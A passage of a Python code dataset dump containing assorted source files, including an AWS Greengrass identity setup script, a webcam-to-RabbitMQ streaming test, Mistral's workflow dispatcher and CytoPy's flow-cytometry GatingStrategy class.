map\n\n#a function that checks whether the lenght of a name is even or odd\ndef name_check(name):\n if len(name)%2 == 0:\n print(\"EVEN\")\n else:\n print(\"ODD\")\n \n# a list of names\npeople = [\"Joseph\",\"Faith\",\"Michael\",\"Muhammed\",\"Sandra\",\"Israel\",\"Victor\"]\n\n#using a for loop to return the result\nfor x in map(name_check,people):\n print(x)\n","sub_path":"map_2.py","file_name":"map_2.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"154825988","text":"#!/usr/bin/env python3\n\n\"\"\"\nCreated on 09 Oct 2020\n\n@author: Jade Page (jade.page@southcoastscience.com)\n\nsource repo: scs_mfr\n\nDESCRIPTION\nThe aws_identity script allows the user to change the identity of an already-configured greengrass install,\nin our use case it is to change the greengrass identity of a device which was set up using a cloned\nbase image without having to reinstall the greengrass software\n\nThe script could also be used to set up a \"blank\" greengrass install, which does not already have an identity, but\ndoes already have the greengrass software.\n\nIf no group name is provided, the host name will be read from the device.\nIf no core name is provided, the host name will be read from the device.\n\nSYNOPSIS\naws_identity.py [-s [-g GROUP_NAME] [-c CORE_NAME]] [-i INDENT] [-v]\n\nEXAMPLES\n./aws_identity.py -s -g scs-test-003-group -c scs-test-003-core -v\n\nDOCUMENT EXAMPLE\n{\"core-name\": \"scs-cube-001-core\", \"group-name\": \"scs-cube-001-group\"}\n\nSEE ALSO\nscs_mfr/aws_deployment\nscs_mfr/aws_group_setup\n\nRESOURCES\nCreated with reference to amazon's own device setup script (URL may change if updated)\nhttps://d1onfpft10uf5o.cloudfront.net/greengrass-device-setup/downloads/gg-device-setup-latest.sh\nhttps://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/iot.html\nhttps://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/greengrass.html\n\nNOTES\nATS_ROOT_CA_RSA_2048_REMOTE_LOCATION in core.aws.greengrass aws_identity is a certificate provided by\namazon itself and may be subject to change e.g. via obsolescence - check here:\nhttps://docs.aws.amazon.com/iot/latest/developerguide/server-authentication.html\n\"\"\"\n\nimport os\nimport sys\n\nfrom botocore.exceptions import NoCredentialsError, ClientError\n\nfrom scs_core.aws.client.client import Client\nfrom scs_core.aws.config.aws import AWS\nfrom scs_core.aws.greengrass.aws_identity import AWSIdentity\n\nfrom scs_core.aws.security.access_key_manager import AccessKeyManager\nfrom scs_core.aws.security.cognito_device import CognitoDeviceCredentials\nfrom scs_core.aws.security.cognito_login_manager import CognitoLoginManager\n\nfrom scs_core.data.json import JSONify\n\nfrom scs_core.sys.logging import Logging\n\nfrom scs_host.sys.host import Host\n\nfrom scs_mfr.cmd.cmd_aws_identity import CmdAWSIdentity\n\n\n# --------------------------------------------------------------------------------------------------------------------\n\nif __name__ == '__main__':\n\n key = None\n\n # ----------------------------------------------------------------------------------------------------------------\n # cmd...\n\n cmd = CmdAWSIdentity()\n\n if not cmd.is_valid():\n cmd.print_help(sys.stderr)\n exit(2)\n\n # logging...\n Logging.config('aws_identity', verbose=cmd.verbose)\n logger = Logging.getLogger()\n\n logger.info(cmd)\n\n\n # ----------------------------------------------------------------------------------------------------------------\n # validation...\n\n if cmd.setup and os.geteuid() != 0:\n logger.error(\"you must have root privileges to set the identity.\")\n exit(1)\n\n\n # ----------------------------------------------------------------------------------------------------------------\n # authentication...\n\n if cmd.setup:\n # credentials...\n credentials = CognitoDeviceCredentials.load_credentials_for_device(Host)\n\n # AccessKey...\n gatekeeper = CognitoLoginManager()\n auth = gatekeeper.device_login(credentials)\n\n if not auth.is_ok():\n logger.error(auth.authentication_status.description)\n exit(1)\n\n manager = AccessKeyManager()\n key = manager.get(auth.id_token)\n\n\n # ----------------------------------------------------------------------------------------------------------------\n # run...\n\n try:\n if cmd.setup:\n iot_client = Client.construct('iot', key)\n gg_client = Client.construct('greengrass', key)\n\n identity = AWSIdentity(iot_client, gg_client, AWS.core_name(), AWS.group_name())\n identity.setup_device()\n identity.save(Host)\n\n else:\n identity = AWSIdentity.load(Host)\n\n if identity:\n print(JSONify.dumps(identity, indent=cmd.indent))\n\n except KeyboardInterrupt:\n print(file=sys.stderr)\n\n except ClientError as error:\n if error.response['Error']['Code'] == 'ResourceAlreadyExistsException':\n logger.error(\"the resources for this group already exist.\")\n\n except (EOFError, NoCredentialsError):\n logger.error(\"credentials error.\")\n","sub_path":"src/scs_mfr/aws_identity.py","file_name":"aws_identity.py","file_ext":"py","file_size_in_byte":4607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"609138655","text":"from setuptools import setup, find_packages\nimport os\n\ncurrent_dir = os.path.abspath(os.path.dirname(__file__))\n\nwith open(os.path.join(current_dir, 'README.rst'), encoding='utf-8') as f:\n long_description = f.read()\n\nsetup(\n name = 'LRT-util',\n version = '0.0.13',\n description = 'Use libRadtran to calculate radiative properties, e.g., radiance, irradiance etc.',\n long_description = long_description,\n classifiers = [\n 'Development Status :: 2 - Pre-Alpha',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3.6',\n 'Topic :: Scientific/Engineering :: Atmospheric Science',\n ],\n keywords = 'libRadtran radiation model RTM',\n url = 'https://github.com/hong-chen/libradtran-util',\n author = 'Hong Chen',\n author_email = 'me@hongchen.cz',\n license = 'MIT',\n packages = find_packages(),\n install_requires = ['nose', 'numpy', 'scipy'],\n python_requires = '~=3.6',\n include_package_data = True,\n zip_safe = False\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"479779230","text":"import pika\n\nimport cv2\nimport pygame.camera\nimport pygame.image\n\nimport zipfile\nimport json\nfrom datetime import datetime\nimport base64\nimport time\nimport os\nimport sys\nimport queue\nimport threading\nimport psutil\nfrom persistqueue import Queue\n\naddressIp='62.244.197.146'\n# addressIp='192.168.116.20'\n\nconnection = pika.BlockingConnection(pika.ConnectionParameters(addressIp,5550))\nchannel = connection.channel()\nqueueName='camlivetest'\nchannel.queue_declare(queue=queueName)\n\nmax_que_size=100\nqueueFrame=Queue(\"/mnt/sd/test\") \n#queueFrame=queue.LifoQueue(100)\nis_exit=False\nopencv\n\n\nclass CamFrameClass:\n def __init__(self, time, image):\n self.time = time\n self.image = image\n\n\n\n\ndef capture(*args):\n cap = cv2.VideoCapture(1)\n print(\"Width: %d, Height: %d, FPS: %d\" % (cap.get(3), cap.get(4), cap.get(5)))\n while not is_exit:\n _startTime=time.time()\n time.sleep(0.01)\n if psutil.virtual_memory()[2]>90 or queueFrame.qsize()>max_que_size: #queueFrame.qsize()>max_que_size: #queueFrame.full() or\n print('queue/memory is full')\n queueFrame.get()\n queueFrame.task_done()\n # sys.exit()\n \n\n ret, frame = cap.read()\n\n if ret != True:\n time.sleep(0.1)\n continue\n\n queueFrame.put(frame)\n\n cap.release()\n\n\n\nif __name__ == '__main__':\n print('start')\n p = []\n \n p.append(threading.Thread(target=capture, args=(1,)))\n p[0].start()\n\n encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 70]\n \n\n while not is_exit:\n if queueFrame.empty():\n time.sleep(0.1)\n frame=queueFrame.get()\n result, encimg = cv2.imencode('.jpg', frame, encode_param)\n imgSize = sys.getsizeof(encimg)\n cv2.imshow('frame',frame)\n print(queueFrame.qsize())\n # print(psutil.virtual_memory()) # physical memory usage\n print('memory % used:', psutil.virtual_memory()[2])\n time.sleep(1)\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n \n\n\n \n\n\n\n\n\ndef tmp():\n # cap = cv2.VideoCapture(1)\n # vidPath=\"/home/cc/video/k1.avi\"\n cap = cv2.VideoCapture(1)\n\n # cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1280);\n # cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 720);\n # cap.set(cv2.CV_CAP_PROP_FPS, 5)\n\n # cap.set(cv2.CAP_PROP_FPS,5)\n # stream.set(cv2.cv.CV_CAP_PROP_FRAME_WIDTH, 1920);\n # stream.set(cv2.cv.CV_CAP_PROP_FRAME_HEIGHT, 1080);\n # stream.set(cv2.cv.CV_CAP_PROP_FPS, 5)\n\n encode_param = [int(cv2.IMWRITE_JPEG_QUALITY), 70]\n averageFps = 0\n frameCount=0\n startTime=time.time()\n # cachePath=\"~/code/men/cache/aa.jpg\"\n while True:\n\n try:\n (g,frame) = cap.read()\n # height, width, depth = frame.shape\n if frame is None:\n break\n if not cap.isOpened():\n break\n\n # width,height = cap.get(cv2.CAP_PROP_FRAME_WIDTH),cap.get(cv2.CAP_PROP_FRAME_HEIGHT)\n\n # print(str(width) + \" \" + str(height))\n\n\n # half = cv2.resize(frame, (1280, 720))\n # result, encimg = cv2.imencode('.jpg', frame, encode_param)\n # size = str(sys.getsizeof(data))\n # cv2.imwrite(cachePath,half,encode_param)\n # img = cv2.imread(cachePath)\n # imgSize=os.path.getsize(cachePath)\n # os.remove(cachePath)\n # height, width = img.shape[:2]\n # print(str(width) + \" \" + str(height) + \" \" + str(imgSize/1024) + \" KB\")\n\n # half = cv2.resize(frame, (640, 480))\n result, encimg = cv2.imencode('.jpg', frame, encode_param)\n imgSize = sys.getsizeof(encimg)\n # height, width = half.shape[:2]\n # print(str(width) + \" \" + str(height) + \" \" + str(imgSize / 1024) + \" KB\")\n\n # imgnp = bytearray(encimg)\n\n\n encoded_string = str(base64.b64encode(encimg))\n # imgSize = sys.getsizeof(encoded_string)\n\n now = datetime.now().isoformat()\n camClass = CamFrameClass(now, encoded_string)\n\n jsonStr = json.dumps(camClass.__dict__)\n # print('sending:'+now )\n # + \" \" + str(width) + \"X\" + str(height)\n\n _startTime=time.time()\n channel.basic_publish(exchange='', routing_key=queueName, body=jsonStr)\n frameCount=frameCount+1\n _diffTime=time.time()-_startTime\n waitTime = 0.1-_diffTime\n if waitTime>0:\n time.sleep(waitTime)\n\n diffTime = time.time() - startTime\n\n if diffTime >=5:\n fps=frameCount/5\n print(\"fps:\" + str(fps) + \" - \" + str(imgSize / 1024))\n startTime = time.time()\n frameCount=0\n\n\n except KeyboardInterrupt:\n # print('hata')\n # break the infinite loop\n break\n\n\n cv2.destroyAllWindows()\n connection.close()\n exit()\n\n\n\n\n\n","sub_path":"mayaclient/rmq1.py","file_name":"rmq1.py","file_ext":"py","file_size_in_byte":4964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"344036719","text":"# Copyright 2016 - Nokia Networks\n# Copyright 2016 - Brocade Communications Systems, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport functools\nfrom osprofiler import profiler\n\nfrom mistral import exceptions as exc\nfrom mistral.workflow import commands\nfrom mistral.workflow import states\n\n\ndef _compare_task_commands(a, b):\n if not isinstance(a, commands.RunTask) or not a.is_waiting():\n return -1\n\n if not isinstance(b, commands.RunTask) or not b.is_waiting():\n return 1\n\n if a.unique_key == b.unique_key:\n return 0\n\n if a.unique_key < b.unique_key:\n return -1\n\n return 1\n\n\ndef _rearrange_commands(cmds):\n \"\"\"Takes workflow commands and does required pre-processing.\n\n The main idea of the method is to sort task commands with 'waiting'\n flag by 'unique_key' property in order guarantee the same locking\n order for them in parallel transactions and thereby prevent deadlocks.\n It also removes commands that don't make sense. For example, if\n there are some commands after a command that changes a workflow state\n then they must not be dispatched.\n \"\"\"\n\n # Remove all 'noop' commands.\n cmds = list([c for c in cmds if not isinstance(c, commands.Noop)])\n\n state_cmd_idx = -1\n state_cmd = None\n\n for i, cmd in enumerate(cmds):\n if isinstance(cmd, commands.SetWorkflowState):\n state_cmd_idx = i\n state_cmd = cmd\n\n break\n\n # Find a position of a 'fail|succeed|pause' command\n # and sort all task commands before it.\n if state_cmd_idx < 0:\n cmds.sort(key=functools.cmp_to_key(_compare_task_commands))\n\n return cmds\n elif state_cmd_idx == 0:\n return cmds[0:1]\n\n res = cmds[0:state_cmd_idx]\n\n res.sort(key=functools.cmp_to_key(_compare_task_commands))\n\n res.append(state_cmd)\n\n return res\n\n\n@profiler.trace('dispatcher-dispatch-commands', hide_args=True)\ndef dispatch_workflow_commands(wf_ex, wf_cmds):\n # TODO(rakhmerov): I don't like these imports but otherwise we have\n # import cycles.\n from mistral.engine import task_handler\n from mistral.engine import workflow_handler as wf_handler\n\n if not wf_cmds:\n return\n\n for cmd in _rearrange_commands(wf_cmds):\n if isinstance(cmd, (commands.RunTask, commands.RunExistingTask)):\n task_handler.run_task(cmd)\n elif isinstance(cmd, commands.SetWorkflowState):\n wf_handler.set_workflow_state(wf_ex, cmd.new_state, cmd.msg)\n else:\n raise exc.MistralError('Unsupported workflow command: %s' % cmd)\n\n if wf_ex.state != states.RUNNING:\n break\n","sub_path":"mistral/engine/dispatcher.py","file_name":"dispatcher.py","file_ext":"py","file_size_in_byte":3177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"530903533","text":"#!/usr/bin.env/python\n# -*- coding: utf-8 -*-\n\"\"\"\nIn a traditional analysis, an immunologist would apply a 'gating strategy';\na series of 'gates' that separate single cell data into the populations of\ninterest. CytoPy provides autonomous gates (see CytoPy.data.gate) to\nemulate this process and these gates can be packaged together for bulk\nanalysis using the GatingStrategy class, housed within this module.\n\nCopyright 2020 Ross Burton\n\nPermission is hereby granted, free of charge, to any person\nobtaining a copy of this software and associated documentation\nfiles (the \"Software\"), to deal in the Software without restriction,\nincluding without limitation the rights to use, copy, modify,\nmerge, publish, distribute, sublicense, and/or sell copies of the\nSoftware, and to permit persons to whom the Software is furnished\nto do so, subject to the following conditions:\nThe above copyright notice and this permission notice shall be included\nin all copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\nEXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF\nMERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.\nIN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY\nCLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,\nTORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\nSOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\n\nfrom ..flow.plotting import CreatePlot\nfrom ..feedback import progress_bar, vprint\nfrom .gate import Gate, ThresholdGate, PolygonGate, EllipseGate, ThresholdGeom, \\\n PolygonGeom, update_polygon, update_threshold\nfrom .experiment import Experiment\nfrom .fcs import FileGroup\nfrom datetime import datetime\nimport mongoengine\n\n__author__ = \"Ross Burton\"\n__copyright__ = \"Copyright 2020, CytoPy\"\n__credits__ = [\"Ross Burton\", \"Simone Cuff\", \"Andreas Artemiou\", \"Matthias Eberl\"]\n__license__ = \"MIT\"\n__version__ = \"1.0.0\"\n__maintainer__ = \"Ross Burton\"\n__email__ = \"burtonrj@cardiff.ac.uk\"\n__status__ = \"Production\"\n\n\nclass Action(mongoengine.EmbeddedDocument):\n \"\"\"\n An Action represents a process applied to the gates/populations in some gating strategy\n that is independent of the gates themselves. At the moment this includes merging populations\n or subtracting one population from another. These actions can appear in a gating strategy\n and will be applied to new data in an autonomous fashion.\n\n Attributes\n ----------\n action_name: str\n Name of the action\n method: str\n Should have a value of \"merge\" or \"subtract\"\n left: str\n The population to merge on or subtract from\n right: str\n The population to merge with or be subtracted from 'left'\n new_population_name: str\n Name of the new population generated from this action\n \"\"\"\n action_name = mongoengine.StringField()\n method = mongoengine.StringField(choices=[\"merge\", \"subtract\"])\n left = mongoengine.StringField()\n right = mongoengine.StringField()\n new_population_name = mongoengine.StringField()\n\n\nclass GatingStrategy(mongoengine.Document):\n \"\"\"\n A GatingTemplate is synonymous to what an immunologist would classically consider\n a \"gating template\"; it is a collection of 'gates' (Gate objects, in the case of CytoPy)\n that can be applied to multiple fcs files or an entire experiment in bulk. A user defines\n a GatingTemplate using a single example from an experiment, uses the object to preview gates\n and label child populations, and when satisfied with the performance save the GatingStrategy\n to the database to be applied to the remaining samples in the Experiment.\n\n Attributes\n -----------\n template_name: str, required\n unique identifier for template\n gates: EmbeddedDocumentList\n list of Gate documents\n creation_date: DateTime\n date of creation\n last_edit: DateTime\n date of last edit\n flags: str, optional\n warnings associated to this gating template\n notes: str, optional\n free text comments\n \"\"\"\n name = mongoengine.StringField(required=True, unique=True)\n gates = mongoengine.ListField(mongoengine.ReferenceField(Gate, reverse_delete_rule=mongoengine.PULL))\n actions = mongoengine.EmbeddedDocumentListField(Action)\n creation_date = mongoengine.DateTimeField(default=datetime.now)\n last_edit = mongoengine.DateTimeField(default=datetime.now)\n flags = mongoengine.StringField(required=False)\n notes = mongoengine.StringField(required=False)\n meta = {\n 'db_alias': 'core',\n 'collection': 'gating_strategy'\n }\n\n def __init__(self, *args, **values):\n self.verbose = values.pop(\"verbose\", True)\n self.print = vprint(verbose=self.verbose)\n super().__init__(*args, **values)\n self.filegroup = None\n\n def load_data(self,\n experiment: Experiment,\n sample_id: str):\n \"\"\"\n Load a FileGroup into the GatingStrategy ready for gating.\n\n Parameters\n ----------\n experiment: Experiment\n sample_id: str\n\n Returns\n -------\n None\n \"\"\"\n self.filegroup = experiment.get_sample(sample_id=sample_id)\n\n def list_gates(self) -> list:\n \"\"\"\n List name of existing Gates\n\n Returns\n -------\n list\n \"\"\"\n return [g.gate_name for g in self.gates]\n\n def list_populations(self) -> list:\n \"\"\"\n Wrapper to FileGroup list_populations. Lists populations\n in associated FileGroup.\n\n Returns\n -------\n list\n \"\"\"\n assert self.filegroup is not None, \"No FileGroup associated\"\n return list(self.filegroup.list_populations())\n\n def _gate_exists(self,\n gate: str):\n \"\"\"\n Raises AssertionError if given gate does not exist\n\n Returns\n -------\n None\n \"\"\"\n assert gate in self.list_gates(), f\"Gate {gate} does not exist\"\n\n def get_gate(self,\n gate: str) -> Gate:\n \"\"\"\n Given the name of a gate, return the Gate object\n\n Parameters\n ----------\n gate: str\n\n Returns\n -------\n Gate\n \"\"\"\n self._gate_exists(gate=gate)\n return [g for g in self.gates if g.gate_name == gate][0]\n\n def preview_gate(self,\n gate: str or Gate or ThresholdGate or PolygonGate or EllipseGate,\n create_plot_kwargs: dict or None = None,\n plot_gate_kwargs: dict or None = None):\n \"\"\"\n Preview the results of some given Gate\n\n Parameters\n ----------\n gate: str or Gate or ThresholdGate or PolygonGate or EllipseGate\n Name of an existing Gate or a Gate object\n create_plot_kwargs: dict (optional)\n Additional arguments passed to CreatePlot\n plot_gate_kwargs: dict (optional)\n Additional arguments passed to plot_gate call of CreatePlot\n\n Returns\n -------\n Matplotlib.Axes\n \"\"\"\n create_plot_kwargs = create_plot_kwargs or {}\n plot_gate_kwargs = plot_gate_kwargs or {}\n if isinstance(gate, str):\n gate = self.get_gate(gate=gate)\n parent_data = self.filegroup.load_population_df(population=gate.parent,\n transform=None,\n label_downstream_affiliations=False)\n gate.fit(data=parent_data)\n plot = CreatePlot(**create_plot_kwargs)\n return plot.plot_gate_children(gate=gate,\n parent=parent_data,\n **plot_gate_kwargs)\n\n def apply_gate(self,\n gate: str or Gate or ThresholdGate or PolygonGate or EllipseGate,\n plot: bool = True,\n print_stats: bool = True,\n add_to_strategy: bool = True,\n create_plot_kwargs: dict or None = None,\n plot_gate_kwargs: dict or None = None):\n \"\"\"\n Apply a gate to the associated FileGroup. The gate must be previously defined;\n children associated and labeled. Either a Gate object can be provided or the name\n of an existing gate saved to this GatingStrategy.\n\n Parameters\n ----------\n gate: str or Gate or ThresholdGate or PolygonGate or EllipseGate\n Name of an existing Gate or a Gate object\n plot: bool (default=True)\n If True, returns a Matplotlib.Axes object of plotted gate\n print_stats: bool (default=True)\n If True, print gating statistics to stdout\n add_to_strategy: bool (default=True)\n If True, append the Gate to the GatingStrategy\n create_plot_kwargs: dict (optional)\n Additional arguments passed to CreatePlot\n plot_gate_kwargs: dict (optional)\n Additional arguments passed to plot_gate call of CreatePlot\n\n Returns\n -------\n Matplotlib.Axes or None\n \"\"\"\n if isinstance(gate, str):\n gate = self.get_gate(gate=gate)\n add_to_strategy = False\n if add_to_strategy:\n assert gate.gate_name not in self.list_gates(), \\\n f\"Gate with name {gate.gate_name} already exists. To continue set add_to_strategy to False\"\n create_plot_kwargs = create_plot_kwargs or {}\n plot_gate_kwargs = plot_gate_kwargs or {}\n parent_data = self.filegroup.load_population_df(population=gate.parent,\n transform=None,\n label_downstream_affiliations=False)\n if gate.ctrl is None:\n populations = gate.fit_predict(data=parent_data)\n else:\n populations = self._control_gate(gate=gate)\n for p in populations:\n self.filegroup.add_population(population=p)\n if print_stats:\n print(f\"----- {gate.gate_name} -----\")\n parent_n = parent_data.shape[0]\n print(f\"Parent ({gate.parent}) n: {parent_n}\")\n for p in populations:\n print(f\"...child {p.population_name} n: {p.n}; {p.n / parent_n * 100}% of parent\")\n print(\"------------------------\")\n if add_to_strategy:\n self.gates.append(gate)\n if plot:\n plot = CreatePlot(**create_plot_kwargs)\n return plot.plot_population_geoms(parent=parent_data,\n children=populations,\n **plot_gate_kwargs)\n return None\n\n def apply_all(self,\n verbose: bool = True):\n \"\"\"\n Apply all the gates associated to this GatingStrategy\n\n Parameters\n ----------\n verbose: bool (default=True)\n If True, print feedback to stdout\n\n Returns\n -------\n None\n \"\"\"\n feedback = vprint(verbose)\n populations_created = [[c.name for c in g.children] for g in self.gates]\n populations_created = [x for sl in populations_created for x in sl]\n assert len(self.gates) > 0, \"No gates to apply\"\n err = \"One or more of the populations generated from this gating strategy are already \" \\\n \"presented in the population tree\"\n assert all([x not in self.list_populations() for x in populations_created]), err\n gates_to_apply = list(self.gates)\n actions_to_apply = list(self.actions)\n i = 0\n iteration_limit = len(gates_to_apply) * 100\n feedback(\"=====================================================\")\n while len(gates_to_apply) > 0:\n if i >= len(gates_to_apply):\n i = 0\n gate = gates_to_apply[i]\n if gate.parent in self.list_populations():\n feedback(f\"------ Applying {gate.gate_name} ------\")\n self.apply_gate(gate=gate,\n plot=False,\n print_stats=verbose,\n add_to_strategy=False)\n feedback(\"----------------------------------------\")\n gates_to_apply = [g for g in gates_to_apply if g.gate_name != gate.gate_name]\n actions_applied_this_loop = list()\n for a in actions_to_apply:\n if a.left in self.list_populations() and a.right in self.list_populations():\n feedback(f\"------ Applying {a.action_name} ------\")\n self.apply_action(action=a,\n print_stats=verbose,\n add_to_strategy=False)\n feedback(\"----------------------------------------\")\n actions_applied_this_loop.append(a.action_name)\n actions_to_apply = [a for a in actions_to_apply\n if a.action_name not in actions_applied_this_loop]\n i += 1\n iteration_limit -= 1\n assert iteration_limit > 0, \"Maximum number of iterations reached. This means that one or more parent \" \\\n \"populations are not being identified.\"\n\n def delete_actions(self,\n action_name: str):\n \"\"\"\n Delete an action associated to this GatingStrategy\n\n Parameters\n ===========\n action_name: str\n\n Returns\n -------\n None\n \"\"\"\n self.actions = [a for a in self.actions if a.action_name != action_name]\n\n def apply_action(self,\n action: Action or str,\n print_stats: bool = True,\n add_to_strategy: bool = True):\n \"\"\"\n Apply an action, that is, a merge or subtraction:\n * Merge: merge two populations present in the current population tree.\n The merged population will have the combined index of both populations but\n will not inherit any clusters and will not be associated to any children\n downstream of either the left or right population. The population will be\n added to the tree as a descendant of the left populations parent\n * Subtraction: subtract the right population from the left population.\n The right population must either have the same parent as the left population\n or be downstream of the left population. The new population will descend from\n the same parent as the left population. The new population will have a\n PolygonGeom geom.\n\n Parameters\n ----------\n action: Action\n print_stats: bool (default=True)\n Print population statistics to stdout\n add_to_strategy: bool (default=True)\n Add action to this GatingStrategy\n Returns\n -------\n None\n \"\"\"\n if isinstance(action, str):\n matching_action = [a for a in self.actions if a.action_name == action]\n assert len(matching_action) == 1, f\"{action} does not exist\"\n action = matching_action[0]\n assert action.method in [\"merge\", \"subtract\"], \"Accepted methods are: merge, subtract\"\n assert action.left in self.list_populations(), f\"{action.left} does not exist\"\n assert action.right in self.list_populations(), f\"{action.right} does not exist\"\n left = self.filegroup.get_population(action.left)\n right = self.filegroup.get_population(action.right)\n if action.method == \"merge\":\n self.filegroup.merge_populations(left=left,\n right=right,\n new_population_name=action.new_population_name)\n else:\n self.filegroup.subtract_populations(left=left,\n right=right,\n new_population_name=action.new_population_name)\n if print_stats:\n new_pop_name = action.new_population_name or f\"{action.method}_{left.population_name}_{right.population_name}\"\n new_pop = self.filegroup.get_population(population_name=new_pop_name)\n print(f\"------ {action.action_name} ------\")\n parent_n = self.filegroup.get_population(left.parent).n\n print(f\"Parent ({left.parent}) n: {parent_n}\")\n print(f\"Left pop ({left.population_name}) n: {left.n}; {left.n / parent_n * 100}%\")\n print(f\"Right pop ({right.population_name}) n: {right.n}; {right.n / parent_n * 100}%\")\n print(f\"New population n: {new_pop.n}; {new_pop.n / parent_n * 100}%\")\n print(\"-----------------------------------\")\n if add_to_strategy:\n self.actions.append(action)\n\n def delete_gate(self,\n gate_name: str):\n \"\"\"\n Remove a gate from this GatingStrategy. Note: populations generated from this\n gate will not be deleted. These populations must be deleted separately by calling\n the 'delete_population' method.\n\n Parameters\n ----------\n gate_name: str\n Name of the gate for removal\n Returns\n -------\n None\n \"\"\"\n self.gates = [g for g in self.gates if g.gate_name != gate_name]\n\n def delete_populations(self,\n populations: str or list):\n \"\"\"\n Delete given populations. Populations downstream from delete population(s) will\n also be removed.\n\n Parameters\n ----------\n populations: list or str\n Either a list of populations (list of strings) to remove or a single population as a string.\n If a value of \"all\" is given, all populations are dropped.\n\n Returns\n -------\n None\n \"\"\"\n self.filegroup.delete_populations(populations=populations)\n\n def plot_gate(self,\n gate: str,\n create_plot_kwargs: dict or None = None,\n **kwargs):\n \"\"\"\n Plot a gate. Must provide the name of a Gate currently associated to this GatingStrategy.\n This will plot the parent population this gate acts on along with the geometries\n that define the child populations the gate generates.\n\n Parameters\n ----------\n gate: str or Gate or EllipseGate or ThresholdGate or PolygonGate\n create_plot_kwargs: dict\n Keyword arguments for CreatePlot object. See CytoPy.plotting.CreatePlot for details.\n kwargs:\n Keyword arguments for plot_gate call.\n See CytoPy.plotting.CreatePlot.plot_population_geom for details.\n\n Returns\n -------\n Matplotlib.Axes\n \"\"\"\n create_plot_kwargs = create_plot_kwargs or {}\n assert isinstance(gate, str), \"Provide the name of an existing Gate in this GatingStrategy\"\n assert gate in self.list_gates(), \\\n f\"Gate {gate} not recognised. Have you applied it and added it to the strategy?\"\n gate = self.get_gate(gate=gate)\n parent = self.filegroup.load_population_df(population=gate.parent,\n transform=None,\n label_downstream_affiliations=False)\n plotting = CreatePlot(**create_plot_kwargs)\n return plotting.plot_population_geoms(parent=parent,\n children=[self.filegroup.get_population(c.name)\n for c in gate.children],\n **kwargs)\n\n def plot_backgate(self,\n parent: str,\n overlay: list,\n x: str,\n y: str or None = None,\n create_plot_kwargs: dict or None = None,\n **backgate_kwargs):\n \"\"\"\n Given some population as the backdrop (parent) and a list of one or more\n populations that occur downstream of the parent (overlay), plot the downstream\n populations as scatter plots over the top of the parent.\n\n Parameters\n ----------\n parent: str\n overlay: list\n x: str\n y: str\n create_plot_kwargs\n Additional keyword arguments passed to CytoPy.flow.plotting.CreatePlot\n backgate_kwargs\n Additional keyword arguments passed to CytoPy.flow.plotting.CreatePlot.backgate\n\n Returns\n -------\n Matplotlib.Axes\n \"\"\"\n assert parent in self.list_populations(), \"Parent population does not exist\"\n assert all([x in self.list_populations() for x in overlay]), \"One or more given populations could not be found\"\n downstream = self.filegroup.list_downstream_populations(population=parent)\n assert all([x in downstream for x in overlay]), \\\n \"One or more of the given populations is not downstream of the given parent\"\n plotting = CreatePlot(**create_plot_kwargs)\n parent = self.filegroup.load_population_df(population=parent,\n transform=None,\n label_downstream_affiliations=False)\n children = {x: self.filegroup.load_population_df(population=x,\n transform=None,\n label_downstream_affiliations=False)\n for x in overlay}\n return plotting.backgate(parent=parent,\n children=children,\n x=x,\n y=y,\n **backgate_kwargs)\n\n def plot_population(self,\n population: str,\n x: str,\n y: str or None = None,\n transform_x: str or None = \"logicle\",\n transform_y: str or None = \"logicle\",\n create_plot_kwargs: dict or None = None,\n **plot_kwargs):\n \"\"\"\n Plot an existing population in the associate FileGroup.\n\n Parameters\n ----------\n population: str\n x: str\n y: str (optional)\n transform_x: str (optional; default=\"logicle\")\n transform_y: str (optional; default=\"logicle\")\n create_plot_kwargs:\n Additional keyword arguments passed to CytoPy.flow.plotting.CreatePlot\n plot_kwargs\n Additional keyword arguments passed to CytoPy.flow.plotting.CreatePlot.plot\n\n Returns\n -------\n Matplotlib.Axes\n \"\"\"\n assert population in self.list_populations(), f\"{population} does not exist\"\n data = self.filegroup.load_population_df(population=population,\n transform=None,\n label_downstream_affiliations=False)\n create_plot_kwargs = create_plot_kwargs or {}\n plotting = CreatePlot(transform_x=transform_x,\n transform_y=transform_y,\n **create_plot_kwargs)\n return plotting.plot(data=data, x=x, y=y, **plot_kwargs)\n\n def print_population_tree(self, **kwargs):\n \"\"\"\n Print the population tree to stdout.\n Wraps CytoPy.data.fcs.FileGroup.print_population_tree\n\n Parameters\n ----------\n kwargs\n See keyword arguments for CytoPy.data.fcs.FileGroup.print_population_tree\n\n Returns\n -------\n None\n \"\"\"\n self.filegroup.print_population_tree(**kwargs)\n\n def 